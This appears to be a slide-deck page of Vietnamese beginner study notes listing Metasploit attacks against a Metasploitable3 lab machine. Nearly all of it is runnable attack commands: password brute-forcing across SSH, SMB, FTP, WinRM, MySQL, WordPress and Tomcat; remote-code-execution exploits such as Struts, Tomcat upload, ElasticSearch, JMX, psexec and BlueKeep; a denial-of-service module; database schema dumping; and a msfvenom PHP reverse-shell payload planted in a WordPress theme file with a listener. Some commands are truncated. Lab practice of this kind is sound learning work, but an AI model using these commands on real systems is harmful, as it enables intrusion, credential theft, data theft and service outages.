metasploitable example attacks list.docx

firearcanist 7 views 40 slides Oct 15, 2024
Slide 1
Slide 1 of 40
Slide 1
1
Slide 2
2
Slide 3
3
Slide 4
4
Slide 5
5
Slide 6
6
Slide 7
7
Slide 8
8
Slide 9
9
Slide 10
10
Slide 11
11
Slide 12
12
Slide 13
13
Slide 14
14
Slide 15
15
Slide 16
16
Slide 17
17
Slide 18
18
Slide 19
19
Slide 20
20
Slide 21
21
Slide 22
22
Slide 23
23
Slide 24
24
Slide 25
25
Slide 26
26
Slide 27
27
Slide 28
28
Slide 29
29
Slide 30
30
Slide 31
31
Slide 32
32
Slide 33
33
Slide 34
34
Slide 35
35
Slide 36
36
Slide 37
37
Slide 38
38
Slide 39
39
Slide 40
40

About This Presentation

metasploitable example attacks list for beginners studies


Slide Content

GlassFish
1.Port 4848
- msfconsole
- search glass
- use auxiliary/scanner/http/glassfish_login
- set user_file path__
- set pass_file path__
- set stop_on_success true
- set rhosts __
- set username ""
- run

Apache Struts - 8282
- use exploit/multi/http/struts_dmi_rest_exec
- set rhosts 192.168.228.132
- set rport 8282
- run
https://medium.com/@dt22/cve-2016-3087-apache-struts-rest-plugin-
with-dynamic-method-invocation-remote-code-execution-
197260439105

Tomcat - 8282
Apache Tomcat cung cấp phần mềm để chạy các ứng dụng Java trong
trình duyệt. Coyote là một máy chủ web độc lập cung cấp các servlet
cho các ứng dụng Tomcat. Nghĩa là, nó hoạt động giống như máy chủ
web Apache, nhưng dành cho Trang máy chủ Java (JSP). Tất cả điều
này có nghĩa là các trang web được truy cập qua cổng 8282 sẽ được tập
hợp bởi một ứng dụng web Java.
Có nhiều mô-đun Metasploit có sẵn cho Tomcat vì vậy bạn nên tập trung
vào mục tiêu của mình:
Khảo sát trang web
Khai thác các trang dễ bị tổn thương
Lấy thông tin xác thực
Triển khai tải trọng
1.Tomcat_enum – Username của tomcat
- use auxiliary/scanner/http/tomcat_enum
- set rhosts 192.168.228.132
- set rport 8282
- set targeturi /manager
- run

2.Tomcat_login
- use auxiliary/scanner/http/tomcat_mgr_login
- set userpass_file ""
- set rhosts 192.168.228.132
- set rport 8282
- set user_file /home/kali/ATHDH/metasploitable3/user
- set pass_file /home/kali/ATHDH/metasploitable3/pass
- set stop_on_success true
- run
3.Tomcat upload

- use exploit/multi/http/tomcat_mgr_upload
- set rhosts 192.168.228.132
- set rport 8282
- set httppassword sploit
- set httpusername sploit
- set target 1
- set payload payload/windows/meterpreter/reverse_tcp
- run
Kết quả:

Jenkins - 8484
Jenkins là một máy chủ tự động hóa mã nguồn mở được viết bằng Java.
Jenkins giúp tự động hóa phần không liên quan đến con người trong quá
trình phát triển phần mềm, với sự tích hợp liên tục và tạo điều kiện thuận
lợi cho các khía cạnh kỹ thuật của quá trình phân phối liên tục.
1.jenkins_script_console
- use expl
- set rport 8484
- set targeturi /
- run
Sau khi vào được shell có thể thao tác như tìm thông tin, hay thêm tài
khoản,,....

IIS - FTP - 21
Vai trò Máy chủ Web (IIS) trong Windows Server cung cấp nền tảng an
toàn, dễ quản lý, mô-đun và có thể mở rộng để lưu trữ các trang web,
dịch vụ và ứng dụng một cách đáng tin cậy.
Trong Windows Server 2008, Internet Information Services (IIS) có giao
diện quản trị và kho cấu hình mới, đồng thời dịch vụ FTP mới được tích
hợp chặt chẽ với thiết kế này. Microsoft đã viết lại dịch vụ FTP và dịch
vụ phiên bản cập nhật này kết hợp nhiều tính năng mới cho phép tác giả
web xuất bản nội dung tốt hơn trước và cung cấp cho quản trị viên web
nhiều tùy chọn triển khai và bảo mật hơn.
Nhưng mặc dù được tích hợp trong Máy chủ Web, dịch vụ IIS FTP hoạt
động khá giống với bất kỳ máy chủ FTP nào khác,
1.IIS-FTP - 21
- use auxiliary/scanner/ftp/ftp_login
- set rhosts 192.168.228.132
- set rport 21
- set user_file /home/kali/ATHDH/metasploitable3/user
- set pass_file /home/kali/ATHshDH/metasploitable3/pass
- run

Sau khi biết được tài khoản, mật khẩu có thể tiến hành tấn công:
- dotdotpwn -m ftp -o windows -U Administrator -P vagrant -h
192.168.228.132

2.IIS - HTTP
Lỗ hổng thực thi mã từ xa tồn tại trong ngăn xếp giao thức HTTP
(HTTP.sys) xảy ra khi HTTP.sys phân tích cú pháp các yêu cầu HTTP
được tạo đặc biệt không đúng cách. Kẻ tấn công khai thác thành công lỗ
hổng này có thể thực thi mã tùy ý trong tài khoản Hệ thống.
Từ chối dịch vụ IIS
Lỗ hổng này được OpenVAS báo cáo là cực kỳ nghiêm trọng. Nó được
xác định bằng số Bản tin bảo mật của Microsoft giải thích nó (MS15-
034 ) và bằng CVE của nó ( 2015-1635 ).
Tạo tấn công DoS:

- use auxiliary/dos/http/ms15_034_ulonglongadd
- set rhosts 192.168.228.132
- run
Kết quả máy mục tiêu bị sập:

psexec
PsExec là một trong những cách khai thác phổ biến nhất chống lại
Microsoft Windows. Đó là một cách tuyệt vời để kiểm tra độ bảo mật
của mật khẩu và chứng minh mật khẩu bị đánh cắp có thể dẫn đến sự
xâm phạm hoàn toàn toàn bộ mạng công ty như thế nào.
Để có thể sử dụng exploit/windows/smb/psexec:
Tên người dùng và mật khẩu hợp lệ phải được đặt.
Tường lửa phải cho phép lưu lượng SMB.
Chính sách bảo mật mạng của máy Windows từ xa phải cho phép điều
đó. Xem phần "Vô hiệu hóa UAC từ xa" bên dưới.
1.Login
- use auxiliary/scanner/smb/smb_login
- set rhosts 192.168.228.132
- set user_file /home/kali/ATHDH/metasploitable3/user
- set pass_file /home/kali/ATHDH/metasploitable3/pass
- run
2.Psexec
- use exploits/windows/smb/psexec

- set rhosts 192.168.228.132
- set smbuser vagrant
- set smbpass vagrant
- run
https://github.com/rapid7/metasploit-framework/blob/master/
documentation/modules/exploit/windows/smb/psexec.md

SSH -22
Metasploit có một mô-đun phụ trợ sẽ kiểm tra thông tin xác thực SSH
trên nhiều loại máy và báo cáo các lần đăng nhập thành công. Nếu bạn
đã kết nối với cơ sở dữ liệu, mô-đun này sẽ ghi lại thông tin đăng nhập
và máy chủ thành công để bạn có thể theo dõi quyền truy cập của mình.
Ngoài ra, mỗi lần đăng nhập thành công sẽ mở ngay một phiên trên máy
từ xa. Sau đó, phiên này có thể được nâng cấp lên phiên Meterpreter
- use auxiliary/scanner/ssh/ssh_login
- set rhosts 192.168.228.132
- set user_file /home/kali/ATHDH/metasploitable3/user
- set pass_file /home/kali/ATHDH/metasploitable3/pass
- set verbose true
-run

WinRM - 5985
WinRM là dịch vụ quản lý từ xa dành cho Windows được cài đặt nhưng
không được bật theo mặc định trong Windows XP và các phiên bản cao
hơn, nhưng bạn cũng có thể cài đặt nó trên các hệ điều hành cũ hơn.
Dịch vụ chị em của WinRM có tên là Windows Remote Shell (WinRS).
Cả hai dịch vụ được xác thực này đều được liên kết với trình nghe
SOAP HTTP hoặc HTTPS và hỗ trợ xác thực Kerberos và NTLM theo
mặc định. Tôi bắt đầu xem xét xác thực NTLM vì nó đã được hỗ trợ
trong Metasploit.
Nếu bạn đang thiết lập WinRM, xin lưu ý rằng thiết lập quickconfig mặc
định sẽ khiến dịch vụ ở trạng thái khó xử, không hoạt động. Nó sẽ đặt
AllowUnencrypted thành false , nghĩa là nó sẽ từ chối thiết lập bất kỳ
phiên nào qua HTTP mà không có SSL. Thật không may, thiết lập
quickconfig sẽ không định cấu hình trình nghe HTTPS. Giờ đây, người
dùng có thể đặt AllowUnecrypted thành true hoặc định cấu hình trình
nghe HTTPS.
Điều đầu tiên cần xây dựng là một mô-đun khám phá cơ bản xác định
xem dịch vụ WinRM có đang lắng nghe trên một cổng HTTP(S) nhất
định hay không. Nếu có, nó cũng liệt kê các phương thức xác thực được
hỗ trợ. Ảnh chụp màn hình cho thấy cách mô-đun khám phá tạo mục
nhập dịch vụ cho WinRM với các loại xác thực có trong thông tin.
1.Quét cổng có WinRM
- use auxiliary/scanner/winrm/winrm_auth_methods
- set rhosts 192.168.228.132
- run

2.Tấn công đăng nhập:
- use auxiliary/scanner/winrm/winrm_login
- set rhosts 192.168.228.132
- set user_file /home/kali/ATHDH/metasploitable3/user
- set pass_file /home/kali/ATHDH/metasploitable3/pass
- set password pass
- run
3.Truy vấn WQL
Khi đã tìm thấy thông tin xác thực hợp lệ cho dịch vụ WinRM, chúng tôi
có thể lạm dụng chức năng WMI để thực thi các truy vấn WQL tùy ý đối
với mục tiêu. Mô-đun này cũng sẽ lưu kết quả truy vấn dưới dạng loot.

Trong ví dụ bên dưới, chúng tôi chạy truy vấn WQL để lấy kiến trúc của
hệ thống từ xa (32 hoặc 64 bit).
- use auxiliary/scanner/winrm/winrm_wql
- set rhosts 192.168.228.132
- set username vagrant
- set password vagrant
- run
4.Truy vấn với winrs cmd
Người chị song sinh dính liền của WinRM, WinRS, cho phép người
dùng khởi tạo một shell trên hộp điều khiển từ xa, gửi lệnh và nhận các
luồng đầu ra. Metasploit có thể gửi bất kỳ lệnh Windows tùy ý nào và
nhận cả STDOUT và STDERR, về cơ bản cung cấp một lớp vỏ không
trạng thái qua HTTP/SOAP.
Điều quan trọng cần lưu ý là hệ vỏ WinRS có thời gian tồn tại tối đa
trước khi dịch vụ đóng chúng. Dịch vụ này cũng có giới hạn lệnh đồng
thời có thể định cấu hình, nhưng những điều này không quan trọng trong
trường hợp này vì chúng tôi chỉ thực thi một lệnh duy nhất và dọn dẹp
shell. Ở đây, chúng tôi thực hiện một lệnh ipconfig đơn giản làm ví dụ.
- use auxiliary/scanner/winrm/winrm_cmd
- set rhosts 192.168.228.132
- set username vagrant

- set password vagrant
- run
Bây giờ chúng ta đang ở vị trí thuận lợi để có được đạn pháo. Trong
nhiều năm, mô-đun PSExec là cách chính để sử dụng thông tin xác thực
hệ thống để lấy shell. Điều này ngày càng trở nên kém tin cậy hơn vì
nhiều tải trọng của Metasploit Framework bị các giải pháp chống vi-rút
phát hiện. Người dùng Metasploit Pro có tùy chọn tạo động các tải trọng
EXE, nhưng điều này không dễ thực hiện được.
5.Thực hiện script exploit
Ưu điểm của mô-đun khai thác WinRM Script Exec là có thể lấy shell
mà không cần kích hoạt giải pháp chống vi-rút trong một số trường hợp

nhất định. Mô-đun này có hai phương thức phân phối tải trọng khác
nhau. Phương thức phân phối chính của nó là thông qua việc sử dụng
PowerShell 2.0. Mô-đun này kiểm tra xem PowerShell 2.0 có sẵn trên hệ
thống hay không. Sau đó, nó sẽ cố gắng kích hoạt thực thi tập lệnh
không hạn chế, một bước quan trọng vì PowerShell không thực thi các
tệp tập lệnh không dấu theo mặc định. Nếu một trong hai lần kiểm tra
này không thành công, nó sẽ mặc định sử dụng phương thức tải trọng
VBS CmdStager, nếu không nó sẽ sử dụng phương thức Powershell 2.0
của chúng tôi.
- use exploits/windows/winrm/winrm_script_exec
- set rhosts 192.168.228.132
- set username vagrant
- set password vagrant
- run

Chinese caidao - 80
- use auxiliary/scanner/http/caidao_bruteforce_login
- set rhosts 192.168.228.
- run

ManageEngine - 8020
Desktop Central là phần mềm quản lý thiết bị di động và máy tính để
bàn tích hợp giúp quản lý máy chủ, máy tính xách tay, máy tính để bàn,
điện thoại thông minh và máy tính bảng từ một vị trí trung tâm. Nó được
sử dụng để tự động hóa các quy trình quản lý máy tính để bàn thông
thường của bạn như cài đặt bản vá, phân phối phần mềm, quản lý Tài
sản CNTT, quản lý giấy phép phần mềm, giám sát số liệu thống kê sử
dụng phần mềm, quản lý việc sử dụng thiết bị USB, kiểm soát máy tính
để bàn từ xa, v.v. Nó hỗ trợ quản lý cả hệ điều hành Windows, Mac và
Linux.
- use exploit/windows/http/manageengine_connectionid_write
- set rhosts 192.168.228.132
- run

ElasticSearch -9200
Mô-đun này khai thác lỗ hổng thực thi lệnh từ xa (RCE) trong
ElasticSearch, có thể khai thác theo mặc định trên ElasticSearch trước
phiên bản 1.2.0. Lỗi được tìm thấy trong API REST, không yêu cầu xác
thực, trong đó chức năng tìm kiếm cho phép thực thi tập lệnh động. Nó
có thể được sử dụng để kẻ tấn công từ xa thực thi mã Java tùy ý. Mô-đun
này đã được thử nghiệm thành công trên ElasticSearch 1.1.1 trên Ubuntu
Server 12.04 và Windows XP SP3.
- use exploit/multi/elasticsearch/script_mvel_rce
- set rhosts 192.168.228.132
- run

Apache Axis2
1.Apache axis2 exploit
Ứng dụng Web Apache Axis2 có ba phần chính: 'Dịch vụ' liệt kê tất cả
các dịch vụ có sẵn được triển khai trong máy chủ này, 'Xác thực' kiểm
tra hệ thống để xem liệu tất cả các thư viện cần thiết có sẵn sàng hay
không và xem thông tin hệ thống, và 'Quản trị' là mô-đun Quản trị Web
Axis2 là bảng điều khiển để quản lý cài đặt Apache Axis2. Mô-đun
Quản trị Web Axis2 cung cấp cách cấu hình Axis2 một cách linh hoạt.
- use exploit/multi/http/axis2_deployer
- set rhosts 192.168.228.132
- set rport 8282
- run
2.Apache axis2 login
- msfconsole
- use auxiliary/scanner/http/axis_login
- set user_file /home/kali/ATHDH/metasploitable3/user
- set pass_file /home/kali/ATHDH/metasploitable3/pass

- set stop_on_success true
- set rhosts 192.168.228.132
- set rport 8282
- run

WebDAV - 8585
Mô-đun này có thể lạm dụng các máy chủ web bị định cấu hình sai để
tải lên và xóa nội dung web thông qua các yêu cầu HTTP PUT và
DELETE.
- use auxiliary/scanner/http/http_put
- set rhosts 192.168.228.132
- set rport 8585
- set filename meterpreter.php
- set path /uploads
- run
https://github.com/rapid7/metasploit-framework/blob/master/
documentation/modules/exploit/multi/http/axis2_deployer.md

SNMP - 161
Giao thức quản lý mạng đơn giản là giao thức Internet tiêu chuẩn để thu
thập và tổ chức thông tin về các thiết bị được quản lý trên mạng IP và để
sửa đổi thông tin đó nhằm thay đổi hành vi của thiết bị.
- use auxiliary/scanner/snmp/snmp_enum
- set rhosts 192.168.228.132
- run

MySQL
Tấn công mật khẩu
-use auxiliary/scanner/mysql/mysql_login
-set RHOSTS 192.168.157.132
-set userpass_file /home/kali/Documents/user_pass
-set verbose yes
-run

Liệt kê tất cả các tài khoản MySQL trên hệ thống và các đặc quyền khác
nhau của chúng.
-use auxiliary/admin/mysql/mysql_enum
-set RHOSTS 192.168.157.132
-set username root
-set password ‘’
-run
Truy xuất toàn bộ nội dung của cơ sở dữ liệu:

-auxiliary/scanner/mysql/mysql_schemadump
-set RHOSTS 192.168.157.132
-set username root
-set password ‘’
-run

JMX-1617
Mô-đun này tận dụng cấu hình không an toàn của giao diện Java JMX,
cho phép tải các lớp từ bất kỳ URL (HTTP) từ xa nào. Các giao diện
JMX bị vô hiệu hóa xác thực
(com.sun.management.jmxremote.authenticate=false) sẽ dễ bị tấn công,
trong khi các giao diện được bật xác thực sẽ chỉ dễ bị tấn công nếu cấu
hình yếu được triển khai (cho phép sử dụng
javax.management.loading.MLet, có trình quản lý bảo mật cho phép tải
ClassLoader MBean, v.v.)
- use multi/misc/java_jmx_server
- set rhosts 192.168.228.132
- set rport 1617
- run

Wordpress - 8585
Khai thác tài khoản mật khẩu trong trong login wordpress.
-use auxiliary/scanner/http/wordpress_xmlrpc_login
-set RHOSTS 192.168.157.132
-set RPORT 8585
-set targeturi /wordpress
-set userpass_file /home/kali/Documents/user_pass
-set blank_passwords true
-set verbose false
-run

Liệt kê những người dùng hiện có và sau đó nó sẽ kiểm tra thông tin xác
thực hợp lệ:
-use auxiliary/scanner/http/wordpress_login_enum
-set RHOSTS 192.168.157.132
-set RPORT 8585
-set userpass_file /home/kali/Documents/user_pass
-set targeturi /wordpress
-run
Exploit chiếm quyền điều khiển:
-B1: Dùng user, pass đã lấy được để đăng nhập vào wordpress và vào
Appearance > Editor chọn header.php

-B2: dùng lệnh sau để tạo phần code thêm cho header.php trong đó gán
lhost và lport là ip máy tấn công và port tấn công

- msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.157.132
lport=5555 -f raw > meterp.php
-B3: copy nội dung file đã tạo paste vào header.php rồi ấn upload
-B4: Setup tool để truy cập shell

- use exploit/multi/handler
- set LHOST 192.168.157.128
- set LPORT 5555
- set payload php/meterpreter/reverse_tcp
- run
-B5: vào lại :8585/wordpress để tool có thể gửi ngược để truy cập shell
Tấn công upload form:
- use exploit/multi/http/wp_ninja_forms_unauthenticated_file_upload
- set rhosts 192.168.228.132
- set rport 8585
- set targeturi /wordpress/
- set form_path /index.php/king-of-hearts/
- run

Remote Desktop
Remote bằng shell:
Dùng DoS đánh sập cổng remote desktop:
-use auxiliary/scanner/rdp/ms12_020_check
-set RHOSTS 192.168.157.132
-run

Dịch vụ này cũng dễ bị tấn công Bluekeep và bạn có thể sử dụng mô-
đun Metasploit thích hợp để kiểm tra sự tồn tại của lỗ hổng này trong
máy mục tiêu.
-use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
-set RHOSTS 192.168.157.132
-set target 2
-run

PHPMyAdmin

Ruby on Rails
Không vào đc port 3000